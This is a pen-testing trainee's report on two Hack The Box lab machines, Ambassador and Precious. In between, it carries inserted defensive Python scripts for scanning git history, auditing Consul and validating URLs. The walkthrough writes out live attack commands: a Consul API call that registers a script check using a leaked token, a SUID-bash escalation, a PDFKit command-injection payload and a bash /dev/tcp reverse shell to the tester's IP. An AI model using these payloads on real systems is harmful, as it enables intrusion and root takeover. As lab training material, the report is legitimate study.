Daily Task Report Pen-Testing Trainee Ahmed Sher ahmedsherfreelance@gmail.com 28-11-2022
Daily Task Summary
Table of Contents
Daily Task Summary
Hack The Box – Ambassador
    System overview
    Post Exploitation
Hack The Box – Precious
    System overview
    Initial Scan
    Service Enumeration and Recon
    Exploitation
    Post Exploitation
Tasks completed:
Ambassador - Completed
Precious
Hack The Box – Ambassador
System overview
IP Address: 10.129.228.56
Hostname: Ambassador
Difficulty: Medium
Post Exploitation
From the previous day, I have SSH credentials to log in to the machine as the developer user. I found a git config file, so I checked the commit history and the branch the project is on.
I can also check the difference between the two commits using the git diff command.
In the later commit the developer removed the authentication token from the config file; the earlier commit still contains it.
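The point of the two commits above is that deleting a token in a later commit does not remove it from history: anyone with read access to the repository can still recover it with git diff or git log -p. As an added example (not part of this report), the script below scans git log -p output for UUID-shaped tokens, records whether each hit was added or removed and in which commit, and shows the secret is still recoverable after its removal. The log text, commit ids, file name and token are constructed placeholders, not values from the box.

```python
import re
from typing import Dict, List

# Constructed `git log -p` output (newest commit first). The commit ids, the
# config file and the token are placeholders invented for this example.
SAMPLE_GIT_LOG = """\
commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: dev <dev@example.invalid>

    remove token from config

diff --git a/config.toml b/config.toml
--- a/config.toml
+++ b/config.toml
@@ -1,3 +1,3 @@
 [consul]
-token = "12345678-abcd-ef01-2345-6789abcdef01"
+token = ""
commit bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Author: dev <dev@example.invalid>

    initial commit

diff --git a/config.toml b/config.toml
--- /dev/null
+++ b/config.toml
@@ -0,0 +1,2 @@
+[consul]
+token = "12345678-abcd-ef01-2345-6789abcdef01"
"""

# Consul ACL tokens are UUIDs; the same scanner takes any other secret pattern.
UUID_RE = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I
)


def scan_git_log(log_text: str, pattern: "re.Pattern[str]" = UUID_RE) -> List[Dict[str, str]]:
    """Walk `git log -p` output and report every added/removed line holding a secret."""
    findings: List[Dict[str, str]] = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
            continue
        if line.startswith("diff --git "):
            # "diff --git a/x b/x": keep the b/ side without its prefix
            path = line.split()[-1][2:]
            continue
        if line.startswith(("+++", "---")):
            continue  # file headers, not content changes
        if line and line[0] in "+-":
            for m in pattern.finditer(line[1:]):
                findings.append({
                    "commit": commit or "",
                    "path": path or "",
                    "change": "added" if line[0] == "+" else "removed",
                    "secret": m.group(0),
                })
    return findings


def secrets_in_history(findings: List[Dict[str, str]]) -> List[str]:
    """Every secret that was ever committed, whether or not a later commit removed it."""
    return sorted({f["secret"] for f in findings if f["change"] == "added"})


if __name__ == "__main__":
    import subprocess
    import sys

    if len(sys.argv) > 1:  # scan a real checkout: python scan.py /path/to/repo
        text = subprocess.run(["git", "-C", sys.argv[1], "log", "-p"],
                              capture_output=True, text=True, check=True).stdout
    else:
        text = SAMPLE_GIT_LOG
    hits = scan_git_log(text)
    for hit in hits:
        print(hit)
    print("still recoverable from history:", secrets_in_history(hits))
```

Run against a real checkout, the removal commit shows up as a "removed" hit and the original commit as an "added" hit for the same value; the fix for a leaked token is rotation, not another commit.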
I can also look into the bash script myself from the directory.
It runs the consul binary. From Google I can see that it is a platform to configure applications across different infrastructures. This is the definition of a CI/CD pipeline, much like Jenkins. I can look up the version number using this command.
consul version
I can search for known vulnerabilities in this version. Searching on Google, I find a general remote code execution bug that I can try. According to it, if the enable_script_checks option is enabled, registering a service with a script check leads to remote code execution. From this post I can see that Metasploit has a module for it. I can also understand that consul listens on port 8500, but I cannot reach this port from outside. I can check the listening ports using this command.
ss -tulpn
It is running internally. I can query it using curl with this command.
curl http://127.0.0.1:8500/v1/agent/self
I get an access-denied error. I can look at the Metasploit module's code to understand what it does here.
I can access it using the ACL token. That is the token I found from the git commit. I can use it in the header using this command.
curl -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" http://127.0.0.1:8500/v1/agent/self
I get a lot of data back, confirming I can now authenticate to the API. To understand the response better, I will save it to a file and send it to my local machine.
To get it onto my local machine I can use this command.
scp developer@10.129.155.176:/tmp/res.txt .
I can then read the response using this command.
cat res.txt | jq
I didn’t find anything useful, so I can go forward with the exploit. According to the exploit, I need to construct a web request like this.
I can use this command for it.
curl -H "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" -X PUT -d '{"ID": "crypt0ace", "Name": "crypt0ace", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/tmp.sh"], "interval": "10s", "timeout": "86400s"}}' http://127.0.0.1:8500/v1/agent/service/register
For this I also create the /tmp/tmp.sh script that the check references, containing a reverse shell to port 9001, and make it executable. When I run the command, however, I don’t get a shell back.
I can try after changing the script to this.
This sets the SUID bit on bash, which can be leveraged with bash -p: with -p, bash keeps the root privileges instead of dropping them when a normal user runs it.
I can now use the command again to see if it works.
The bash binary now has the SUID bit set and I can use it to get a root shell.
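The registration command above only works because the agent accepts script checks over its HTTP API and the leaked token is allowed to register services. As an added example (not code from this report or from Consul), the script below audits a service-registration body for checks that would execute a command and checks an agent configuration for the settings that make that possible, showing the weak configuration beside a hardened one. The registration body, configuration values and script path are constructed placeholders.

```python
import json
from typing import Any, Dict, List, Optional

# Constructed registration body in the shape of the PUT to
# /v1/agent/service/register shown above; names and path are placeholders.
SAMPLE_REGISTRATION: Dict[str, Any] = {
    "ID": "example-svc",
    "Name": "example-svc",
    "Address": "127.0.0.1",
    "Port": 80,
    "check": {
        "Args": ["/usr/bin/bash", "/tmp/example.sh"],
        "interval": "10s",
        "timeout": "86400s",
    },
}

# Constructed agent configurations (JSON form of the Consul agent config).
WEAK_AGENT_CONFIG: Dict[str, Any] = {"enable_script_checks": True}
HARDENED_AGENT_CONFIG: Dict[str, Any] = {
    "enable_script_checks": False,
    # scripts may only come from local config files / CLI, never the HTTP API
    "enable_local_script_checks": True,
    "acl": {"enabled": True, "default_policy": "deny"},
}


def _key(d: Dict[str, Any], name: str) -> Optional[Any]:
    """Consul accepts both "Args" and "args"; look the key up case-insensitively."""
    for k, v in d.items():
        if k.lower() == name:
            return v
    return None


def script_checks(registration: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return every check in a registration body that would run a command."""
    checks: List[Dict[str, Any]] = []
    single = _key(registration, "check")
    if isinstance(single, dict):
        checks.append(single)
    many = _key(registration, "checks")
    if isinstance(many, list):
        checks.extend(c for c in many if isinstance(c, dict))
    return [c for c in checks if _key(c, "args") is not None]


def config_findings(cfg: Dict[str, Any]) -> List[str]:
    """Flag the agent settings that turn a leaked service-write token into code execution."""
    findings: List[str] = []
    if cfg.get("enable_script_checks"):
        findings.append(
            "enable_script_checks=true: script checks can be registered over the HTTP API, "
            "so any holder of a token with service:write can run commands as the agent user"
        )
    acl = cfg.get("acl") or {}
    if not acl.get("enabled") or acl.get("default_policy", "allow") != "deny":
        findings.append("ACLs disabled or default_policy=allow: API calls need no scoped token")
    return findings


if __name__ == "__main__":
    print("script checks in registration:", json.dumps(script_checks(SAMPLE_REGISTRATION)))
    for label, cfg in (("weak", WEAK_AGENT_CONFIG), ("hardened", HARDENED_AGENT_CONFIG)):
        print(label, config_findings(cfg) or ["no findings"])
```

On a real host, feed config_findings the agent's JSON config and script_checks the bodies of service registrations seen in API logs; a non-empty result from either is the condition the exploit above depends on.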
Hack The Box – Precious
System overview
IP Address: 10.129.9.123
Hostname: Precious
Difficulty: Easy
Initial Scan
First, I can start up with nmap to map the ports that are open in this machine. I can use this command for a full network scan.
nmap -sC -sV -A -p- -vvvvv 10.129.9.123 -oN allports.nmap
Where:
-sC runs nmap's default scripts against the open ports it finds, to gather more information and spot vulnerabilities
-sV enables version detection on the services running on the ports
-A enables the previous two options plus OS detection
-p- scans all ports
-vvvvv makes the output very verbose
-oN writes the scan result in normal format to the allports.nmap file
I can find the results in the allports.nmap file. According to this, there are 2 ports open:
22 for SSH
80 for HTTP
I can see the results here.
I can see that the webserver points to a domain precious.htb. I can add it to my hosts file at /etc/hosts.
Service Enumeration and Recon
I can also view the website on the browser.
It takes a URL and converts it to a PDF. I can view the page source, but there is nothing interesting in it.
I can test it by providing it with my IP and also running Burp Suite in the background. I can also run netcat on port 80 to get the request back and inspect its contents. Before doing that, I can run recon in the background using gobuster to find directories and files.
gobuster dir -u http://precious.htb -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x php,txt,html
I get an error saying the URL is invalid. I can pass the request to repeater to see the response headers as well.
I can see the backend server is running nginx and Phusion Passenger with Ruby. I search on Google for known vulnerabilities but find none for this version, because it was released recently, in September.
I can test the website with different payloads to check if I get an error indicating some backend misconfiguration that I can exploit. But nothing works.
I tried single and double quotes to check SQL or PHP issues but nothing comes up. I also used this payload to check for SSTI.
{{7*7}}
To test the actual functionality, I can make a dummy index.html page and try to load that through the website to see the response as well.
It fetches the page and downloads a PDF of it. I don’t see a directory where it gets stored so I will just download it. I also forwarded the request to repeater to see the response.
I can see the contents and the metadata of the PDF. I can also look into the metadata using exiftool.
I can see that it is using PDFKit to generate the PDFs. I can check the release date for the version number from Google.
It was from April 12th. I will use Google to find out if it is vulnerable to anything. I find a page which notes that it is vulnerable to command injection in versions earlier than 0.8.7.2. This website also shows the PoC for this vulnerability. According to it, if the URL is not properly sanitized, it can lead to code execution.
I can try this exploit with the ping command to test whether I have remote code execution.
http://10.10.14.207/?name=#{'%20`ping -c 1 10.10.14.207`'}
I can see a request being made but I don’t see a ping callback.
I can try changing it to 127.0.0.1 and see if I get a response back.
http://127.0.0.1/?name=#{'%20`ping -c 1 10.10.14.207`'}
I see an error on the page, but I can see that it called back to my local machine with a ping. This means I have blind code execution on the machine.
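The bug class above is a user-supplied URL being interpolated into a command line that a shell later interprets, so shell syntax inside the URL runs as a command. As an added example (not code from this report or from PDFKit), the snippet below shows that vulnerable construction beside a hardened version: the URL is checked against the characters RFC 3986 allows, restricted to http/https with a real host and no embedded credentials, rejected if it points at a loopback or private address, and then passed to the converter as a single argv element with no shell involved. The wkhtmltopdf invocation and output path are assumptions for illustration; the vulnerable form is only built as a string, never executed.

```python
import ipaddress
import re
import subprocess
from typing import List
from urllib.parse import urlsplit

# Characters RFC 3986 permits in a URL. Backticks, quotes, braces, spaces,
# pipes, angle brackets and backslashes are not in this set, so a URL that
# needs them was crafted for something other than fetching a page.
URL_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+$")


def vulnerable_command(url: str) -> str:
    """The pattern behind the bug: user input dropped into a string a shell will parse.

    Anything like `...` or $(...) inside url executes when this string reaches
    a shell. Returned for contrast only; never run it.
    """
    return f"wkhtmltopdf {url} /tmp/out.pdf"


def validate_url(raw: str) -> str:
    """Accept only a well-formed, external http(s) URL; raise ValueError otherwise."""
    if not URL_CHARS.match(raw):
        raise ValueError("URL contains characters outside RFC 3986")
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http/https URLs are allowed")
    if not parts.hostname or parts.username or parts.password:
        raise ValueError("missing host or embedded credentials")
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        ip = None  # a DNS name, not an IP literal
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved):
        raise ValueError("internal address not allowed")
    return raw


def safe_command(raw: str, out_path: str = "/tmp/out.pdf") -> List[str]:
    """Build an argv list: the URL reaches the converter as one argument, with no shell."""
    url = validate_url(raw)
    # --disable-local-file-access keeps the renderer from reading file:// paths
    return ["wkhtmltopdf", "--disable-local-file-access", url, out_path]


def render(raw: str, out_path: str) -> None:
    # subprocess.run with a list and without shell=True never invokes /bin/sh,
    # so shell metacharacters in the URL have no meaning even if validation missed one.
    subprocess.run(safe_command(raw, out_path), check=True, timeout=60)


if __name__ == "__main__":
    # Constructed inputs: an ordinary page and the shape of the injection payload above.
    for candidate in ("https://example.invalid/page?x=1",
                      "http://127.0.0.1/?name=#{'%20`id`'}"):
        try:
            print("accepted:", safe_command(candidate))
        except ValueError as exc:
            print("rejected:", candidate, "->", exc)
```

The character check rejects the payload shape used on this box at the first line, and the address check rejects the 127.0.0.1 target independently; the argv construction is the part that removes the bug class even when a validator is wrong.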
Exploitation
I can leverage it to get a reverse shell. I can use this command for it.
http://127.0.0.1/?name=#{'%20`bash -c "/bin/bash -i >& /dev/tcp/10.10.14.207/9001 0>&1"`'}
This will give me a call back on port 9001.
I have a shell.
Post Exploitation
I can use these commands to stabilize my shell.
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
stty raw -echo;fg
I am the user ruby. From the passwd file I can see there are 2 other users, henry and root.
I can look into henry’s home directory, but I cannot read the user.txt file.
I can look into my own home directory as well. I see a .bundle directory with a config file.
I have henry’s password that I can use to log in to SSH.
I can use this command to see if this user can run any commands as the root user.
sudo -l
I can try to edit this file and include a reverse shell.
I cannot edit this file.